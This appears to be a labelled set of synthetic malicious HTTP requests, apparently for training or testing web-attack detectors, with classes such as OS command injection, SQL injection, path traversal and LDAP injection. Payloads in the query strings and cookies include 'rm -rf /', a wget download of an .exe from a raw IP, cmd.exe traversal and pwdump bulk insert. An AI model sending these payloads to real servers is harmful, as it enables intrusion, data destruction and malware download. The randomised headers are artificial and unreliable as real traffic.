ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: erEcOsi@8seaoan.st
If-Modified-Since: Tue, 28 Sep 04 22:30:47 UTC
If-Unmodified-Since: Sat, 15 Nov 08 12:13:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5644
MIME-Version: 0.7
Pragma: EsrhtgM2='j7'
Proxy-Authorization: Digest realm
Authorization: sslt Eskt=oit2itS
Range: 6369-,501-7998
Referer: /vewnso/nEqEs/liEnet1e/Lh0kRa0d.exe
TE: deflate;q=0.2,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.3 (X11; U; Linux i386 2.3; et-ct; rv:2.6.0) Gecko/39017716
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0316x1204
Via: 2.9 167.226.136.247:50322, 9.2 www.f4izyw.html:6
Transfer-Encoding: aoezn
Upgrade: Akupc/1.8, aT6m/0.6
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42449
Start - Id: 42888
class: OsCommanding
GET /Gitniatooda/yctxochm/emdoaoeoahlsntn.swf?QB@VXOdT=iselaer&1ggetc=50&o3laose=h%25ee&esS=18&ceestieashhsbet=iyn&sansakihst=1PfI5&cmdrsps9e=%7Cwnf&svst0ue=%7Cdir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&tp=538&hWaitt8ohnvp4ds=G9eiw HTTP/1.0
Host: www.soapagth.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: hz-gb-2312, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=13226
Client-ip: 96.55.27.134
Cookie: E6l9=ul;ncadmineerndtriro1;ssneouIw=xr4e;xsb3ie4e=0;ui=p%sor;r0xG3I6ox=mtt=a;leg2sdozgFIzaqi=ftp&
Cookie2: $Version="01"
Date: Tue, 30 Sep 08 19:12:16 GMT
ETag: "Wp7NOJ9WHkU4s9jlY"
Expect: tlgm
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 26 Jan 08 11:54:49 GMT
If-Unmodified-Since: Sun, 27 Jan 08 12:10:25 CET
If-Match: *
If-None-Match: "R4gxx.Lv6@g0pUjM"
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 8637
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: -057067,0-214264
Referer: http://5egn.com/8sDhop1/ad4Pv/2immia/errn0ka/xodst0ee.tiff
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.3 (compatible; Konqueror/5.4; Win 9x; le5iqc7ase; 7eubqma; owsemdq)
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4835x5695
Via: 4.2 104.99.53.44, HTTP/1.9 www.sd1tt.html
Transfer-Encoding: gzip
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------

null

End - Id: 42888
Start - Id: 43378
class: OsCommanding
GET /aReopTPooiei/hAf77BxIw112vPg-orgl/6X9G3K.css?e0M-linkC_=aL_u8pp1&esmuwicCri4e=%60+rm++++-rf++++%2F++%60 HTTP/1.0
Host: www.ld9s.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.9, identity;q=0.4, deflate;q=0.2, deflate, deflate;q=0.4
Accept-Language: ien-eqs7Nac;q=0.0, lrv-w0seY
Cache-Control: no-store
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="667"
Date: Mon, 17 Aug 09 04:46:19 CET
ETag: W/"094MHSgefeJK4Vl5"
Expect: railv
From: uskt@Nx0n.org
If-Modified-Since: Tue, 23 Mar 04 23:26:26 CET
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: "5fo-Bx0kQ@V316g-SUkK"
If-None-Match: *
If-Range: "zHHE3.kwA1FIsV0opf"
Max-Forwards: 1
MIME-Version: 2.7
Pragma: jntdishi=r
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://www.ehhst17.net/usr0Ns/rhgsDs/eeez/knHs/7tdO.exe
TE: trailers,trailers
Trailer: Expect
User-Agent: o_8vrmQL http://www.ecia.net
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 4.4 www.ehoa4si.css
Transfer-Encoding: gzip
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 17.138.146.187
X-Serial-Number: 68319129
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43378
Start - Id: 44128
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 156.195.184.240:82128
Connection: keep-alive
Accept: audio/x-wav, image/*, audio/*;q=0.3
Accept-Charset: x-mac-cyrillic, windows-1252;q=0.8, koi8
Accept-Encoding: gzip, identity, compress, deflate, deflate;q=0.2
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 196.173.120.66
Cookie: not=5;sdogvF=as;soasln=018;7tws6tqGrif=eqH mtei/processing-instructionys
Cookie2: $Version="066"
Date: Sat, 31 May 08 24:30:57 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 22 Mar 06 10:16:43 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: *
Max-Forwards: 345
MIME-Version: 2.6
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Digest realm
Range: 2856-325921,765830-7785,3752-597
Referer: /7ouon.nsf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 6.1; to-Tn; rv:1.1.7) Gecko/02182818
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 436 88.16.203.181 "fcfDrdodlimhhiie" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44128
Start - Id: 40980
class: SqlInjection
GET /itUtceohk5e/nG/Wjqiari8ur/nvdZZ0kJ7nNWngMBoy6/6REdropIDkY6puTS/niWeMIkiIariNKRHqe/n58speiyvj7/telnetLaWidCmWopenuWc/phsTovevFigTdTbDya/EiRnshuoaHeedsml/e6brjThYUZGyhXhzdPE.jpeg?gai=g%29%3Bin%3Eizsthqo%28&uO33dqhk=miEfQL_XKqq HTTP/1.0
Host: 17.248.16.39
Connection: ynnns
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: jY-eicaOdb;q=0.1, RhsoeTre-f1ry;q=0.1
Cache-Control: no-store
Client-ip: 234.91.212.180
Cookie: oeDtislo=672837078;gNvG=bulk     insert iy   from   'pwdump.exe'   with   (codepage='RAW' );upn2fsseeqcbcww=7909501;rM9tmwaqoonids=10858
Cookie2: $Version="6"
Date: Tue, 13 Jan 09 15:46:48 CET
ETag: W/"3SEM@41N03GnazFlYR"
Expect: 100-continue
From: rso1@lseLdehaua.biz
If-Modified-Since: Sat, 11 Sep 04 16:37:04 UTC
If-Unmodified-Since: Tue, 26 Feb 08 01:37:14 GMT
If-Match: "8zrhdC0nfRjaBPlZ9g"
Max-Forwards: 0
Authorization: 68aN aEm8=eemr
Range: 462-,-89,25-
Referer: http://hs3y.biz/2Dbyeh1i/wmpcrtn/seesei/mtnat/Opeyk.jpeg
TE: trailers
User-Agent: nthwba3/0.8.7.2.5
UA-CPU: x86
UA-OS: Win95
UA-Color: color32
Via: HTTP/6.9 www.pSdk.js, 4.1 www.99na.jpeg:26, 0.7 86.134.27.227
Transfer-Encoding: gzip
Upgrade: iat/7.2, leta8s/6.5, pQu/8.7
Warning: 455 www.sliflg.jpg "eyfiunfe9Mutu" "Wed, 31 Jan 07 12:29:53 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40980
Start - Id: 43188
class: OsCommanding
GET /jSo6MALeZnE/4wy4-cC3tRhLAei0HqqF/g-whEMQc0a2gq/0R96kvq/thVYYtO2lZNqGoo.gif?hbql7eacxo=4094523&nndo7ge0wtet7=8916&pl=54816863&diax6v=h%25m&Xhscoscad3t9os=r+dNthaantni%25th&aobLeaCeeay=7uYynLVtiM&ttpeaoqnae=3588&zgei=lGct.UIpK04&J3tjA=ta%3Bliaou&ih0yDZbin4x57@=ct0scqm698glhvbrd&eAnbh31z=47B&mnuh7t7ln1=%7Cid++++%7C HTTP/1.0
Host: www.ty2ly.org
Connection: ddioeEss
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 177.135.197.204
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="8"
Date: Thu, 04 Aug 05 11:09:44 UTC
ETag: W/"46pzfwCzSZKUNdDPb-"
Expect: 4attte
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 17 Jan 09 07:52:49 UTC
If-Unmodified-Since: Wed, 29 Dec 04 21:30:46 CET
If-Match: "wSuQC36_X9T7kQBYNZ"
If-None-Match: "z3Zy50k-uH2p20Bo@.A"
If-Range: "i.xPWuTqTqLD4dF"
Max-Forwards: 05
MIME-Version: 7.5
Pragma: peAe6=rDU
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Basic ZHBudTk6ZmliSWVkaGU=
Range: 3473-351,462906-
Referer: /URtdl/Ifeo/auouhSn.php4
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.6 (compatible; rogevd; SunOS sun4u; eoemipt; dnisagta; n5WTedcae)
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: ieke/5.8 www.ht5hroR.js, 9sI4t/2.9 www.5gcu.css, FTP/8.5 125.169.32.133
Transfer-Encoding: compress
Upgrade: liyiE/2.7, 4hsi/6.7
Warning: 944 www.beyry.html:93 "LTbae5" "Mon, 05 Mar 07 08:57:49 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43188
Start - Id: 43655
class: OsCommanding
PUT /41_76L89/autoexecUTHCL7TmochaT.LG.mdb? HTTP/1.1
Content-Length: 262
Content-Language: 0e2c
Content-Encoding: deflate
Content-Location: /ehlaf41d.php3
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 14 Apr 04 17:24:07 UTC
Host: 202.197.52.29:226
Connection: fshlgl
Accept: video/quicktime, application/*
Accept-Charset: windows-874, windows-1254, iso-8859-3;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-cache
Cookie: ORoVHPJwbeC="; telnet 29.140.70.54    80    ;
If-Modified-Since: Sat, 23 Feb 08 13:35:55 UTC
If-Match: "RUJD-qMzfzOVGqSFiXqM"
If-None-Match: *
Max-Forwards: 52
Referer: /fSnmrt0u/svr6cd/valsr/thme/sN0e.php3
User-Agent: Mozilla/8.0 (X11; U; Open BSD i586 7.6; fa-o1; rv:4.1.8) Gecko/17319749
UA-Disp: 3641,1050,8
Via: 1.3 www.leint.shtml:4, 9.0 146.185.149.229
Transfer-Encoding: gzip
X-Forwarded-For: 13.135.19.72

WuGzhP=osttPaY&of88nb=e&sosp=eb1eeewgeteoeul&&9n=19&dnanwut=rrdPO&TambashiugMminr=xgg6&divRJTM=iTgZmvvjR&childBdivC=f7aplu4location@e&tPennehiIN4ss=02816&ttial06x=014236&tnos0lt=riksonednw&bhsbQsam5wt=o71Rs&boot.iniq5eacceptuJP=6bodyo)a&GU0dDDsamconnect=99

End - Id: 43655
Start - Id: 45134
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 99.0.58.63
Connection: keep-alive
Accept: application/*;q=0.9, text/*;q=0.6, image/*
Accept-Charset: utf-8;q=0.6
Accept-Encoding: gzip;q=0.0
Accept-Language: esieoae-5u6;q=0.9, eomIn-gacvt, ddout-oeilAug, sa5cnff-y7tamat, gtheElc-8mt
Cache-Control: no-cache
Client-ip: 175.81.181.89
Cookie: seIs8e=r7i;jhlawur= ?vhuoq[;ieoettiaate=44
Cookie2: $Version="6"
Date: Tue, 26 Jan 10 19:27:43 GMT
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 701
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: 6wbHod ntpheho=riwgh
Range: -3,456-488022
Referer: /IgeRih/rrfTelva.exe
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: nHDrE9xHt http://www.obssea1.biz
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: 3.0 108.65.25.139:63, 4.4 251.119.173.108, FTP/8.1 228.211.131.56
Transfer-Encoding: xnrmir
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45134
Start - Id: 37011
class: LdapInjection
GET /tPQMr9zeb2u_Dm4/eFaK4sock_stream9opsF8k/iONS6rklp8hvLMS2KdZ/azq--/eryoutttgeaovdt8e.jsp?eSkm6rehb=oheao&75ry=j4GnMl%40JL&nf=iunr%3EeeTOdiv&sdr7eoi=22405123&lndT=+a7%25%28m%40th+kij&nme86ibefecet=+s%24oz&WdTj2UE=6025&etielsteUIdehss=%29++++%28+%7C+++%28+cn%3D*o+++%27brien*+++%29%28mail%3D*o%27brien*%29&mer7z=4OpibStA&Fyfaccess_log=7105654 HTTP/1.1
Host: 161.194.209.226:3
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.1, compress, compress, compress;q=0.4, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 37.233.198.38
Cookie: moal5TRebss=dratmja0o;dcr8dr2dst5=pLfp;tcniah=tcVr9UffT0;cjmwS9oqgonp=80u(iihzhdb;y4=oc
Cookie2: $Version="777"
Date: Thu, 23 Jun 05 02:26:06 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: ete2k@zfNl4.de
If-Modified-Since: Sun, 20 Jan 08 11:01:09 GMT
If-Unmodified-Since: Sun, 23 May 04 07:33:29 CET
If-Match: ".acXrwbdxMtqbN0KX"
If-None-Match: "7H4gI5pCf3_gBNjbksw"
If-Range: "4Y2TTD-en6pWwtvGK"
Max-Forwards: 73
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Basic aFdpZm9objpzaG1ucmw=
Range: 11-,-9658
Referer: /0eiuUri/bw73eerr/hiEstn.bin
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: gB@XJe7 http://www.oiSslL8d.com
UA-CPU: StrongARM
UA-Disp: 720,086,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8274x205
Via: 2.3 www.idyilm.htm, 0.0 www.cgl4d.png
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37011
Start - Id: 43955
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.evegTpf5mo.st:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-kr, x-mac-chinesesimp;q=0.6, windows-874, iso-10646-ucs-2;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: XZ4cpWW7vqcI=/w6oyecM;/t>6 htacces ig ;jsozoenf=Rd;aabsi=Pst;nn8aia= &nph-D;tiutt6seen4q=5279013;kqreiseTxauNa=at1
Cookie2: $Version="790"
Date: Sun, 11 Feb 07 18:38:27 CET
ETag: W/"g.zs56ap96bucj4wI"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "ODgc4cyMJr@4jwx32IM"
If-None-Match: "VOaYWKZvAx.oiVM"
If-Range: Sat, 24 Jan 04 24:31:49 UTC
Max-Forwards: 85
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://www.hsgr.biz/uEreo/se3LW/stctl/bffl/9wdctgh.mdb
TE: trailers,trailers
Trailer: Via
User-Agent: i9_6kv http://www.xsQqao.fr
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: FTP/8.0 108.237.253.181:89, HTTP/4.4 209.128.105.216
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43955
Start - Id: 45637
class: PathTransversal
GET /104W8D_HYAx/pT/sW@wOn999Q/sujatacsygar.aspx?IleatwtOAg=oeyu76h&etssc6mRac=tie&ackuouu=4717765&no9lanrshbs=navetl1&a0su=tOn-&ldqntsvo=ls6&s8emeegRm=air2%25hyewnctra&Z_Gnph-ldeleteP.@Tbgsound3=duiftrnavo1sfc1i&aia=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&A2=hpZoz&9piktsgpl=401-Qt&C7TThdulr=eermmatftpcmd&a92EeraiEdx=uXz9mavy HTTP/1.1
Host: 5.74.84.177
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=274
Client-ip: 220.15.215.234
Cookie: A_bQ=mAwr;0eErtaqhh=a?;h1k9U7aQ1NAS=jailikegavarteoED<K;zTtthetzecgel=1454
Cookie2: $Version="56"
Date: Mon, 10 Nov 08 24:14:12 GMT
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: soov59N@5mxue.fr
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Wed, 02 Nov 05 13:59:52 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: "yeVFiT5pXsOY.0tcI"
If-Range: *
Max-Forwards: 418
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Digest uri=/imexzta/laneCe/iiafH/tnesreDw.msf
Range: -5753
Referer: /etn4T/NeereodV/deeosa9e/iurd.php3
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: hmh8jepjbPta8
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 1.6 www.eh7yy.tiff:5
Transfer-Encoding: compress
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45637
Start - Id: 43518
class: OsCommanding
GET /window.openCujWL/3LwNTDNKsA_P/Snozcjn/6KJq/hpQxpBc/o@.@Dcr.swf?H@uD=7850680&21juXrn=tadE9execR&rdYIh=eW3BbpG2LMs&jn=iznrs2ncH%3Fh%26Dso&saikRc=4tU9o&ioAo=31469496&nrE5enog=%5Cn+++++wget+++http%3A%2F%2F101.96.156.205%3A2465%2Fnftp.exe&i2lkeaaHurftb=cBp.uCb8EjIS HTTP/1.1
Host: 206.216.88.207
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tt-adjgep, beix-fS;q=0.5, z-ptfc0f, o-A9HlMgm;q=0.7, eeyu-sUmr
Cache-Control: min-fresh=480
Client-ip: 108.184.195.217
Cookie: aqsrot=dBGf_d8Tx;9bhPBvI=neldehdfetiedi;aq=1517513014
Cookie2: $Version="4"
Date: Fri, 23 Feb 07 11:54:29 CET
ETag: "U8-_GKPN9c8RKJvrPqX"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Thu, 13 Nov 08 11:46:17 UTC
If-Unmodified-Since: Mon, 15 Aug 05 11:40:39 GMT
If-Match: *
If-None-Match: "H4rSj8SPBuZY_weZA9"
If-Range: Tue, 01 Jun 04 19:50:49 UTC
Max-Forwards: 95
MIME-Version: 5.5
Pragma: mrt=ct2to
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM bWhoaHdtUmNzc3B0b255c2Vvb2VlY2U0aGFyMWZ0bWFoZWdib2lh
Range: 41-,-475,4948-
Referer: /upunh/bel3tew.nsf
TE: trailers,deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: c4FbkC5aUw http://www.E2gwevj.com
UA-CPU: PowerPC
UA-Disp: 308,529,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 473x8335
Via: FTP/6.8 www.Ihuamoh.tiff, 2.2 2.224.77.226:7866, HTTP/7.7 252.148.237.206:31710
Transfer-Encoding: rbhcon
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 119.116.114.21
X-Serial-Number: 61216613
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43518
Start - Id: 36478
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: 87.150.133.87
Connection: close
Accept: text/*;q=0.7, text/xml;q=0.7
Accept-Charset: windows-874;q=0.5, iso-2022-jp, isiri-3342;q=0.5, iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=723
Client-ip: 92.39.253.160
Cookie: se6eibF=rdqnpezziidIty;i2xsfem=an1creb9;9aijsg=58896;rdctaiwGetfsrH=tscriptoaognwhtpasseft
Cookie2: $Version="877"
Date: Tue, 27 Jul 04 15:44:34 CET
ETag: "b.tqILcRPgjyibN"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Wed, 09 Apr 08 10:25:34 CET
If-Unmodified-Since: Wed, 29 Jun 05 24:28:26 CET
If-Match: "i9rD18_.SG8kNEuEfk"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 421
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM d09jRGlnc2VnaWJyZWthdDk0bWU3NzlpbW5qbk9zRXNoZGx0TWVuVWRhb3Fvbw==
Authorization: NTLM bHBzYWVzaGVBdXcycmhkQXNvbG9PYmVPSW0zZU1rRVJhZXo=
Range: 57-,410056-,436232-1281
Referer: http://ceil.org/vacbl/foksre/e58r/yditeaup/anen.jsp
TE: trailers,deflate
Trailer: Authorization
User-Agent: jtorIa/9.4
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 0.2 195.202.24.221:66427, FTP/4.4 182.0.72.61, HTTP/4.6 180.189.39.27
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36478
Start - Id: 45159
class: PathTransversal
GET ////? HTTP/1.1
Host: www.iibsa.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ri-at5ran;q=0.6, hamt-d;q=0.1, stcnai-xscg;q=0.5, akcOdlgt-twhtwdn;q=0.9
Cache-Control: no-store
Client-ip: 168.50.166.68
Cookie: hmkrrRwaslears=eordXhacikateye;hna5lunh=homem opassthrulordn)us;anDmsu= dcati3ha\demt-0air
Cookie2: $Version="70"
Date: Wed, 03 Sep 08 22:59:59 GMT
ETag: W/"fJzIz8jtWw2VDvgEB"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Wed, 06 Oct 04 19:14:39 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 1069
MIME-Version: 3.0
Pragma: 6tg2h='wndlCny2'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: taTsdb aitarUn=enijlRs
Referer: /Tanwlw/niery/r7ynLs/cnvItoi/eh4ogt.tar.gz
TE: deflate;q=0.2,gzip,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 0.1; rt-9i; rv:1.3.0) Gecko/88856985
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45159
Start - Id: 35053
class: SqlInjection
GET /td-DwrmUbdl50fElx0/rYHW2nilPiRKAd_-mI/Olerneos0esnenimwrsI/selssdheNdynewsta/7psj1SidkL/eiySsty5RaecmorNp/tm5S-VjzpAqo_/EPBL/dYAzJZ4BmC.-7P4JB/tush.asmx?hhd2oaAfeisipim=tbM&ayt=3lVA&uRd9y=5603&Orrhioa2seqnh=3T&tey32rfeev=36&Iin=bulk++++insert+++++ntj8o++++from++++%27pwdump.exe%27++++with++++%28codepage%3D%27RAW%27++%29&idTeanpYaehc=4tze8aIwtetoz3 HTTP/1.0
Host: 130.41.231.92
Connection: close
Accept: audio/*, application/rtf;q=0.4, audio/*
Accept-Charset: iso-8859-9, iso-8859-5;q=0.3
Accept-Encoding: 
Accept-Language: 5qsl-noenfoA3, eb-S
Cache-Control: us9t=u
Client-ip: 28.68.252.164
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Sat, 23 Apr 05 01:06:48 GMT
ETag: "x@ZBI_j@wDfonJsoFI7"
Expect: 100-continue
If-Modified-Since: Tue, 18 Jul 06 01:34:39 GMT
If-Unmodified-Since: Wed, 31 Mar 04 10:23:10 UTC
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "@x4hYxC9ukkoLTw-k"
Max-Forwards: 4286
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: PnTt stlaaah0=afAAao6
Authorization: Digest opaque="sdwaq"
Range: 56684-,-230
Referer: http://Eio6sgs.ch/dEesOl1w/norta/vg5esads/1trla/hegEvmpw.shtml
TE: deflate;q=0.7
